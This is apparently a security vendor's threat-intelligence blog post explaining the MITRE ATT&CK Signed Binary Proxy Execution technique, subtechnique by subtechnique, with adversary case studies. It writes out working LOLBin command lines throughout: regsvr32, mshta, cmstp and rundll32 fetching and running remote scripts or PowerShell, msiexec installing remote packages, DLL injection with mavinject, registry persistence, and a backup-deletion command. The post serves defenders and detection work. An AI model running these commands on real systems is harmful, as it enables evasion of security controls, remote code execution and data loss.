T1218 Signed Binary Proxy Execution of the MITRE ATT&CK Framework

Picus Labs analyzed millions of adversary techniques and published the Red Report 2021 and the Top Ten MITRE ATT&CK techniques used by adversaries. We are continuing our blog series on the techniques in the Top Ten list. 

This is the fourth blog of the series, and we explained MITRE ATT&CK T1218 Signed Binary Proxy Execution in detail. In the Red Report 2021, this technique is the fourth most used MITRE ATT&CK technique.

The Red Report 2021 - Top Ten MITRE ATT&CK Techniques

MITRE ATT&CK T1218 Signed Binary Proxy Execution

Signed binaries, the binaries signed with trusted digital certificates, can execute on Windows operating systems protected by digital signature validation and application controls. However, adversaries frequently abuse these legitimate binaries to evade security controls. These binaries are also known as Living-off-the-Land binaries (LOLBins).

What is Signed Binary Proxy Execution?

The term "Signed Binary Proxy Execution" refers to the process of executing a command or executable through the use of another executable signed with trusted digital certificates. Adversaries leverage the trust of signed  executables to evade defensive mechanisms.

Subtechnique 1: T1218.001 Compiled HTML File

A Compiled HTML (.chm) file consists of a collection of HTML pages. A CHM file may also include a compressed compilation of ActiveX, Java, JScript, VBA, and HTML image formats .jpeg, .gif, and .png files [1]. Adversaries use custom CHM files containing embedded malicious payloads to bypass application controls [2].

Adversary Use of Compiled HTML File

1. Bypassing Content Filters of Email Security Controls

CHM files are not considered executables by many organizations. As a result, they are more likely to evade content filters that filter incoming email messages according to the attachment name or type.

Masslogger trojan [3], Silence APT group [4], and DeathStalker [5] leverages CHM files as containers to evade detection for their spearphishing emails.

2. Bypassing Device Guard User Mode Code Integrity (UMCI)

In older Microsoft Windows versions, CHM content is displayed using underlying Internet Explorer browser components that are loaded via the HTML Help executable program (hh.exe). When a user clicks a CHM file or a menu item that opens the help file inside the Help Viewer, the HTML Help executable program (hh.exe) is launched [6]. hh.exe invokes the HTML Help ActiveX control, which displays the help file and provides the user with navigation and other features.

However, there is a security issue on Windows 10 versions before v1703, which is enumerated as CVE-2017-8625. hh.exe runs Internet Explorer in the medium integrity mode, and a normal iexplore process is running in the low integrity mode, which makes it easier to exploit the browser contained within hh.exe [7]. For example, the following code in a custom CHM file can start calc.exe [7].

<SCRIPT>
alert("Click OK to open calculator");
var shell = new ActiveXObject("WScript.Shell");
shell.run('"calc.exe"');
x.Click();
</SCRIPT>

Example 1: Custom CHM file

However, this approach requires a high level of user interaction. Firstly, a user must open the malicious CHM file, then click “OK” on the JavaScript popup window, and finally click “Yes” on the ActiveX security warning.


Figure 1: Example ActiveX warning

Subtechnique 2: T1218.002 Control Panel

Control Panel items are dynamic link libraries (DLLs) or executable (.exe) files that enable users to configure the Windows environment [8]. The Windows Control Panel process binary (control.exe) is responsible for the execution of Control Panel items. Adversaries leverage control.exe for proxy execution of malicious payloads [9].

Control Panel items are registered executable (.exe) or Control Panel (.cpl) files that allow users to configure the environment of Windows. A Control Panel file is created by creating a .dll file and renaming its extension as .cpl. Although they are typically accessed by clicking an icon in the Control Panel, they can be executed directly from the command line or via an application programming interface (API) call.

Adversary Use of Control Panel

1. Executing DLL files with .cpl extension through the Registry

When the Control Panel is launched, the following registry locations are checked to load Control Panel files (CPLs):

  • HKLM\Software\Microsoft\Windows\CurrentVersion\Control Panel\CPLs
  • HKCU\Software\Microsoft\Windows\CurrentVersion\Control Panel\CPLs

Since regular users have write-access to the second registry location, it is feasible to write a key into the registry that will load and execute malicious code upon Control Panel execution [10].

  • reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Control Panel\Cpls" /v payload.cpl /t REG_SZ /d "C:\payload.cpl"

Note that the payload .cpl file is actually a renamed malicious DLL file. Even though the DLL file (payload.cpl) does not conform to the CPL file specification or does not export CPlApplet functions, it is loaded and run via its DllEntryPoint when the Control Panel is executed [11].

Since the registry binary (reg.exe) located in the Windows folder is allowed to be executed by AppLocker and Control Panel is allowed in most of the environments, this method is used by adversaries to bypass application controls.

As an example, the InvisiMole threat group registers its Stage 4 payload as a Control Panel item under this registry key [12]:

  • HKCU\Software\Microsoft\Windows\CurrentVersion\Control Panel\CPLs
    • "infocard" = "%APPDATA%\Microsoft\AddIns\infocardadd.cpl"

Then, the Stage 3 payload of InvisiMole opens the Control Panel to trigger the execution of Stage 4 for the first time.

Note that the infocardadd.cpl file used by InvisiMole does not conform to the CPL specification. It means that if the user manually executes the infocard.cpl file, it will not be loaded due to the missing CPlApplet function, and an error may occur. But, as mentioned above, this registry method does not require a valid CPL file.

2. Executing DLL files stored in ADS

control.exe is a Windows command-line utility used to launch Control Panel items. It can be used to execute a malicious DLL file that is embedded in an Alternate Data Stream (ADS) [13]:

  • control.exe C:\Windows\tasks\file.txt:evil.dll

3. Bypassing file extension allowlists

Malicious Control Panel items can be distributed via phishing campaigns or as part of a multi-stage malware infection such as CPL malware [14]. Control Panel (.cpl) files may evade file extension allow lists of simple email filters and other security controls by disguising DLL files with .cpl extension.

When a user double-clicks a CPL file, Windows automatically launches the Control Panel (control.exe) with the file as an argument, which loads the CPL and invokes its CPlApplet function.

Subtechnique 3: T1218.003 CMSTP

CMSTP (the Microsoft Connection Manager Profile Installer) is a built-in Windows command-line utility used to install Connection Manager service profiles. Adversaries utilize CMSTP to proxy execution of malicious commands by supplying CMSTP.exe with installation information files (.inf) infected with these commands.

In a legitimate use, CMSTP.exe accepts an .inf file as a parameter and installs a service profile:

  • cmstp.exe [/nf] [/s] [/u] [drive:][path]serviceprofilefilename.inf

Adversary Use of CMSTP

Adversaries may supply a malicious .inf file containing an UnRegisterOCXSection section which executes a malicious .sct file using scrobj.dll. Since CMSTP.exe is a legitimate and signed Microsoft application, this execution may bypass AppLocker and other application control defenses.

For example, MuddyWater APT Group used the following command to execute an .inf file (DefenderService.inf) [15]:

  • cmstp.exe /s C:\programdata\DefenderService.inf

The DefenderService.inf file includes the following UnRegisterOCXSection section that is used to invoke the malicious Defender.sct COM scriptlet (SCT) file. Note that, RegisterOCXSection can also be used.

[version]

Signature=$chicago$

AdvancedINF=2.5

 

[DefaultInstall_SingleUser]

UnRegisterOCXs=UnRegisterOCXSection


[UnRegisterOCXSection]
%11%\scrobj.dll,NI,c:/programdata/Defender.sct

Example 2: Malicious Defender.sct used by MuddyWater

Defender.sct contains an obfuscated JavaScript code that runs a malicious PowerShell script. 

CMSTP can also be used to load and execute remote SCT files:

  • cmstp.exe /ni /s https://example.com/malicious.inf

In this case, UnRegisterOCXSection will include a remote sct file:

[UnRegisterOCXSection]
%11%\scrobj.dll,NI,https://example.com/malicious.sct

Example 3: UnRegisterOCXSection for remote malicious .sct file

cmstp.exe is located in the following paths:

  • C:\Windows\System32\cmstp.exe
  • C:\Windows\SysWOW64\cmstp.exe

Subtechnique 4: T1218.004 InstallUtil

installutil.exe (Installer Tool) is a command-line utility that enables the installation and uninstallation of server resources by running the installer components contained in specified assemblies [16]. Adversaries use InstallUtil to bypass application whitelisting by proxy execution of EXE and DLL files.

Adversary Use of InstallUtil

The following command executes the uninstaller components in the assembly myAssembly.exe:

  • installutil /u myAssembly.exe

Adversaries embed malicious code into the uninstaller component of EXE or DLL files, and execute the malicious code by running InstallUtil.exe with /u[ninstall] option:

  • installutil.exe /logfile= /LogToConsole=false /U payload.dll

For example, the SideWalk backdoor executes its malware loader leveraging installUtil.exe using the following command where the InstallWebService.sql file is the malicious .NET loader [16]:

  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /ParentProc=none /U C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallWebService.sql

Note that the file extension does not have to be .exe or .dll.

InstallUtil.exe is located in the following paths depending on the installed .NET version:

  • C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe
  • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe
  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe

Subtechnique 5: T1218.005 Mshta

Mshta.exe is a Windows command-line utility that executes Microsoft HTML Applications (HTA) files. HTAs incorporate all of the capabilities of Windows Internet Explorer - its object model and technologies - without enforcing the browser's strict security policy or user interface [17]. Thus, adversaries use mshta.exe to execute .hta files, JavaScript, JScript, and VBScript.

Adversary Use of Mshta

Adversaries use Mshta for the following purposes:

1. Executing HTA files

The first use case of mshta.exe by adversaries is executing .hta files that include malicious JavaScript, JScript, or VBScript scripts.

  • mshta.exe payload.hta

2. Inline execution of VBScript and JavaScript scripts

Adversaries also use Mshta to execute VBScript scripts supplied as a command line argument:

  • mshta.exe vbscript:Close(Execute("GetObject(""script:https[:]//<ip/domain>/payload[.]sct"")"))

The same method can be used to run JavaScript:

  • mshta.exe javascript:a=GetObject("script:https://<ip/domain>/payload.sct").Exec();close();

3. Executing VBScript, JScript, and JavaScript scripts

Mshta can also open a hidden HTA file in an alternate data stream (ADS). Of course, adversaries embed malicious VBScript, JScript, or JavaScript files in this HTA file.

  • mshta.exe "C:\ads\file.txt:payload.hta"

mshta.exe is located in the following paths:

  • C:\Windows\System32\mshta.exe
  • C:\Windows\SysWOW64\mshta.exe

Subtechnique 6: T1218.007 Msiexec

Msiexec is a Microsoft signed Windows command-line utility to install, modify, and perform operations on Windows Installer from the command line [18]. Adversaries abuse msiexec.exe to install malicious local or remote MSI files and call DLLRegisterServer to register and execute malicious DLL files. MSI (Microsoft Installer) is an installer package file format used by Windows.

Adversary Use of Msiexec

Adversaries use Msiexec for the following purposes:

1. Installing local MSI files

Adversaries use msiexec to install malicious .msi files silently. The /quiet parameter of the msiexec utility is used to specify the quiet mode, which requires no user interaction.

  • msiexec /quiet /i payload.msi

Msiexec is also used by adversaries to install remote (network accessible) MSI files. Note that the file extension does not have to be .msi.

  • msiexec /quiet /i http://<IP/Domain>/malicious.png

2. Executing DLL files by calling DLLRegisterServer

Msiexec has the capability to call DLLRegisterServer like regsvr32. Accordingly, adversaries abuse msiexec to execute malicious DLL files. For example, the following command can be used to a malicious DLL while registering it with DLLRegisterServer:

  • msiexec /y "C:\payload.dll"

In addition, msiexec can also execute a DLL file while un-registering the DLL file:

  • msiexec /z "C:\payload.dll"

msiexec.exe is located in the following paths:

  • C:\Windows\System32\msiexec.exe
  • C:\Windows\SysWOW64\msiexec.exe

Subtechnique 7: T1218.008 Odbcconf

ODBCCONF.exe is a Microsoft signed command-line utility in the Windows OS that enables the configuration of ODBC (Open Database Connectivity) drivers and data source names [19]. Odbcconf is also capable of executing DLL files. Adversaries abuse Odbcconf to load and execute malicious payloads in DLL files.

The legitimate use of ODBCCONF.exe is the configuration of ODBC (Open Database Connectivity) drives and data source names, where ODBC is an open standard Application Programming Interface (API) for database access.

Adversary Use of Odbcconf

ODBCCONF.exe has an action, REGSVR, to register a DLL [19]. REGSVR is equivalent to regsvr32.exe. Therefore, attackers can use ODBCCONF.exe for the same purpose as regsvr32.exe, executing malicious DLL files with the following command:

  • odbcconf /A {REGSVR c:\temp\payload.dll}

/A is the switch to identify an action such as REGSVR.

/F switch of ODBCCONF.exe is used to specify a .rsp response file:

  • odbcconf /F file.rsp

file.rsp might look like this:

  • REGSVR c:\temp\payload.dll

Thus, /F switch with a .rsp response file that specifies REGSVR action, and the DLL file can also be used to execute a malicious DLL file. Note that /A is not used in a response file.

odbcconf.exe is located in the following paths:

  • C:\Windows\System32\odbcconf.exe
  • C:\Windows\SysWOW64\odbcconf.exe

Subtechnique 8: T1218.009 Regsvcs/Regasm

Regsvcs.exe and Regasm.exe are Microsoft signed Windows utilities that can be used to register .NET Component Object Model (COM) assemblies. Adversaries abuse Regsvcs.exe and Regasm.exe to evade application control by utilizing binary attributes to specify code to be executed prior to registration ( [ComRegisterFunction] ) unregistration [ComUnregisterFunction].

Regasm (Assembly Registration Tool) reads the metadata contained in an assembly and populates the registry with the required entries, allowing COM clients to create.NET Framework classes transparently [20].

Regsvcs (.NET Services Installation Tool) loads and registers an assembly and creates registers, and installs a type library in a COM+ application [21].

Adversary Use of Regsvcs and Regasm

Adversaries use Regsvcs and Regasm to execute a malicious shellcode in a DLL file. Since it is a legitimate Windows binary, this method bypasses Application Whitelisting (AWL) controls and AppLocker policies. One of the following commands can be used to load the target DLL file and execute its RegisterClass [22].

  • regsvcs.exe payload.dll
  • regsvcs.exe /u payload.dll
  • regasm.exe payload.dll
  • regasm.exe /u payload.dll

The regasm.exe and regsvcs.exe files are located in this folder (depends on the .NET version):

  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\

Therefore, these utilities exist only in .NET installed machines. However, the lack of regsvcs/regasm in a target machine cannot block adversaries; they download and use them. For example, Agent Tesla RAT downloads regasm.exe to %temp% directory and then uses it [23].

Subtechnique 9: T1218.010 Regsvr32

Regsvr32 is a built-in Windows command-line utility that allows users to register and unregister OLE controls in the Windows Registry, such as DLLs and ActiveX controls [24]. Since Regsvr32 is a trusted component of the Windows operating system that cannot be disabled or constrained easily, adversaries abuse Regsvr32 to avoid detection while executing malicious payloads.

Adversary Use of Regsvr32

Adversaries use Regsvr32.exe to bypass application whitelisting by loading Component Object Model (COM) scriptlets(SCT files) to execute DLLs under user permissions. The following command shows an example use of regsvr32.exe:

  • regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll

The SCT file is an XML document. It contains a registration tag that may contain VBScript or JScript code. For example, the following SCT executes calc.exe:

<?XML version="1.0"?>

<scriptlet>

<registration 

    progid="awl_bypass"

    classid="{A1112221-0000-0000-0000-000DA00DACDC}" >

        <script language="JScript">

                <![CDATA[var r = new ActiveXObject("WScript.Shell").Run("calc.exe");]]>


</script>

</registration>

</scriptlet>

Example 4: SCT example that runs calc.exe

It is not required that the file ending with .sct, but the technique is based on the use of SCT files and Windows Script Components. As an example, APT32 (OceanLotus) Threat Group used regsvr32.exe to dynamically download the g4.ico file, which is actually an SCT file:

  • regsvr32.exe\" /s /n /u /i:http://193.169.245.137:80/g4.ico scrobj.dll

Note that this method does not modify the registry because the COM object is not registered but only executed.

Regsvr32.exe can also be used to execute local SCT files:

  • regsvr32.exe /s /u /i:file.sct scrobj.dll

regsvr32.exe is located in the following paths:

  • C:\Windows\System32\regsvr32.exe
  • C:\Windows\SysWOW64\regsvr32.exe

Subtechnique 10: T1218.011 Rundll32

Rundll32 is a Windows command that loads and runs 32-bit dynamic-link libraries (DLLs). In addition to DLL files, Rundll32 can execute DLL payloads, Control Panel item (.cpl) files, scripts, and COM Server payloads. Because of its extensive execution capabilities, Rundll32 is one of the most used living off-the-land binaries (LOLBin) used by adversaries.

Adversary Use of Rundll32

Adversaries use Rundll32 for the following purposes:

1. Executing DLL files

The primary adversary use case of Rundll32 is executing malicious files.

Executing a DLL file in Host: Adversaries abuse Rundll32 to execute a malicious DLL file (malicious.dll). EntryPointwould is the name of the entry point in the .DLL file to execute.

  • rundll32.exe payload.dll,EntryPoint

Executing a DLL file from SMB share: Rundll32 is able to execute a DLL file located in an SMB share:

  • rundll32.exe \\<IP Address>\share\malicious.dll,EntryPoint

Executing a DLL file stored in an Alternate Data Stream (ADS): The following command can be used to execute a DLL file in an ADS with Rundll32.

  • rundll32.exe "C:\ads\file.txt:ADSDLL.dll",DllMain

2. Executing JavaScript

Adversaries also abuse Rundll32 to execute JavaScript codes, which gives capabilities beyond just running DLLs.

Executing commands in Windows: The following code can be used to execute an arbitrary command in Windows:

  • rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication "; eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()");

Executing malicious code from the Internet: The following code can be used to execute a JavaScript script with Rundll32 that runs a PowerShell script that is downloaded from the Internet.

  • rundll32.exe javascript:"\..\mshtml,RunHTMLApplication "; document.write(); new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');"

Executing malicious JavaScript from the Internet: It is also possible to use Rundll32.exe to execute a JavaScript script that calls a remote JavaScript script:

  • rundll32.exe javascript:"\..\mshtml,RunHTMLApplication"; document.write();GetObject("script:<URL>")

3. Executing COM server payloads

Adversaries also use Rundll32.exe to load DLL/EXE COM server payloads or Scriptlet URL codes.

  • rundll32.exe -sta {CLSID}

CLSID is the unique class ID of the COM object. rundll32.exe is located in the following paths:

  • C:\Windows\System32\rundll32.exe
  • C:\Windows\SysWOW64\rundll32.exe

Subtechnique 11: T1218.012 Verclsid

Verclsid.exe is the Shell Extension CLSID Verification Host component of Microsoft Windows, where CLSID stands for Class ID. It verifies shell extensions before allowing them to be used by Windows Explorer or Windows shell. Adversaries utilize verclsid.exe to run malicious COM objects created in the registry to evade defensive controls.

Adversary Use of Verclsid

Microsoft built Verclsid.exe to verify COM shell extensions before they are instantiated by Windows Explorer. The following command can be used to run a malicious COM object created in the registry, where the Class ID (CLSID), a unique identification number used to identify COM objects [25]:

  • verclsid.exe /S /C {CLSID}

Adversaries also use verclsid.exe in a spearphishing campaign to initiate network connections and download and write files to disk [26]. verclsid.exe is located in the following paths:

  • C:\Windows\System32\verclsid.exe
  • C:\Windows\SysWOW64\verclsid.exe

Subtechnique 12: T1218.013 Mavinject

Mavinject, Microsoft Application Virtualization (App-V) Injector, is used by Windows to inject code into external processes as part of App-V. Adversaries abuse mavinject.exe for injecting malicious DLLs into running processes, in other words, for DLL injection. Because mavinject.exe is digitally signed by Microsoft, proxy execution of malicious codes using it may evade security controls.

Adversary Use of Mavinject

Adversaries use Mavinject for the following purposes:

1. Executing DLL files

The primary use case of mavinject.exe is injecting malicious DLL files into the running process. The generic form of the command is this:

  • mavinject32.exe <PID> <DLL_PATH>

For example, the following command injects payload.dll into a process with PID 1337:

  • mavinject.exe 1337 /INJECTRUNNING c:\payload.dll

Using an elevatedPowerShell prompt you can get the PID easily. For instance, the following command abuses MavInject.exe to inject payload.dll into the running services.exe process using DLL injection.

  • mavinject.exe ((Get-Process services).Id) /INJECTRUNNING C:\payload.dll

2. Executing DLL files stored as ADS

Mavinject is also capable of injecting DLL files embedded in Alternate Data Streams (ADS).

  • mavinject.exe 1337 /INJECTRUNNING "C:\file.txt:payload.dll"

mavinject.exe is located in the following paths:

  • C:\Windows\System32\mavinject.exe
  • C:\Windows\SysWOW64\mavinject.exe

Subtechnique 13: T1218.014 MMC

The Microsoft Management Console (MMC) is used to create, save, and open administrative tools referred to as snap-ins. Snap-ins enable users to administer Windows OS’s hardware, software, and network components. Adversaries abuse mmc.exe to execute malicious .msc files, which are snap-in control files associated with MMC [27].

Adversary Use of MMC

Adversaries use MMC for the following purposes:

1. Executing malicious .msc files

In order to abuse MMC to execute malicious .msc files, adversaries configure a snap-in to load a Component Object Model (COM) Class Identifier (CLSID) that has been added to the registry. Adversaries initiate this attack by creating a malicious registry Class Identifier (CLSID) subkey. Then, they create custom consoles that include the "Link to Web Address" snap-in associated with the malicious CLSID subkey [27]. After saving the .msc file, adversaries can execute the malicious CLSID payload using the following command:

  • mmc.exe -Embedding c:\payload.msc

The -Embedding switch enables attackers to open GUI binaries in a stealthy manner.

2. Executing built-in .msc files for malicious purposes

Microsoft Windows operating system has dozens of built-in .msc files developed to help power users to perform legitimate tasks [28]. However, adversaries may also use MMC to execute these built-in .msc files to perform malicious tasks.

For example, the following command can be used to delete the backup catalog in the system.

  • mmc.exe wbadmin.msc delete catalog -quiet

mmc.exe is located in the following paths:

  • C:\Windows\System32\mmc.exe
  • C:\Windows\SysWOW64\mmc.exe

References

[1]  “Microsoft HTML Help 1.4.” https://docs.microsoft.com/en-us/previous-versions/windows/desktop/htmlhelp/microsoft-html-help-1-4-sdk.

[2]  “Signed Binary Proxy Execution: Compiled HTML File.” https://attack.mitre.org/techniques/T1218/001/.

[3]  N. Biasini, “Masslogger campaigns exfiltrates user credentials.” http://blog.talosintelligence.com/2021/02/masslogger-cred-exfil.html.

[4]  “Silence group targeting Russian Banks via Malicious CHM.” https://reaqta.com/2019/01/silence-group-targeting-russian-banks/.

[5]  P. Delcher, “What did DeathStalker hide between two ferns?,” Kaspersky, 03-Dec-2020. https://securelist.com/what-did-deathstalker-hide-between-two-ferns/99616/.

[6]  “HTML Help ActiveX Control Overview.” https://docs.microsoft.com/en-us/previous-versions/windows/desktop/htmlhelp/html-help-activex-control-overview.

[7]  “Bypassing Device guard UMCI using CHM – CVE-2017-8625,” 13-Aug-2017. https://msitpros.com/?p=3909.

[8]  “Implementing Control Panel Items.” https://docs.microsoft.com/en-us/previous-versions/windows/desktop/legacy/cc144185(v=vs.85).

[9]  “Signed Binary Proxy Execution: Control Panel.” https://attack.mitre.org/techniques/T1218/002/.

[10]  “AppLocker Bypass – Control Panel,” 24-May-2017. https://pentestlab.blog/2017/05/24/applocker-bypass-control-panel/.

[11]  “Signed Binary Proxy Execution: Control Panel.” https://attack.mitre.org/techniques/T1218/002/.

[12]  https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf.

[13]  “control LOLBAS.” https://lolbas-project.github.io/lolbas/Binaries/Control/.

[14]  https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf.

[15]  “Iranian Threat Group Updates Tactics, Techniques and Procedures in Spear Phishing Campaign.” https://www.mandiant.com/resources/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.

[16]  tdykstra, “Installutil.exe (Installer Tool).” https://docs.microsoft.com/en-us/dotnet/framework/tools/installutil-exe-installer-tool.

[17]  “HTML Applications.” https://docs.microsoft.com/en-us/previous-versions/ms536471(v=vs.85).

[18]  JasonGerend, “msiexec.” https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec.

[19]  David-Engel, “ODBCCONF.EXE.” https://docs.microsoft.com/en-us/sql/odbc/odbcconf-exe.

[20]  tdykstra, “Regasm.exe (Assembly Registration Tool).” https://docs.microsoft.com/en-us/dotnet/framework/tools/regasm-exe-assembly-registration-tool.

[21]  tdykstra, “Regsvcs.exe (.NET Services Installation Tool).” https://docs.microsoft.com/en-us/dotnet/framework/tools/regsvcs-exe-net-services-installation-tool.

[22]  O. M. [mvp], “AppLocker – Case study – How insecure is it really? – Part 1,” 13-Dec-2017. https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/.

[23]  J. Walter, “Agent Tesla,” 10-Aug-2020. https://www.sentinelone.com/labs/agent-tesla-old-rat-uses-new-tricks-to-stay-on-top/.

[24]  “Regsvr32 - Register a DLL - Windows CMD - SS64.com.” https://ss64.com/nt/regsvr32.html.

[25]  “xwizard_sct.” https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5.

[26]  M. H. Keshia LeVan, “Phishing Attacks Using Verclsid.exe: Threat Detection,” 06-Apr-2017. https://redcanary.com/blog/verclsid-exe-threat-detection/.

[27]  “Signed Binary Proxy Execution: MMC.” https://attack.mitre.org/techniques/T1218/014/.

[28]  , “List of Windows commands .MSC.” http://www.auditiait.es/en/list-of-commands-msc/.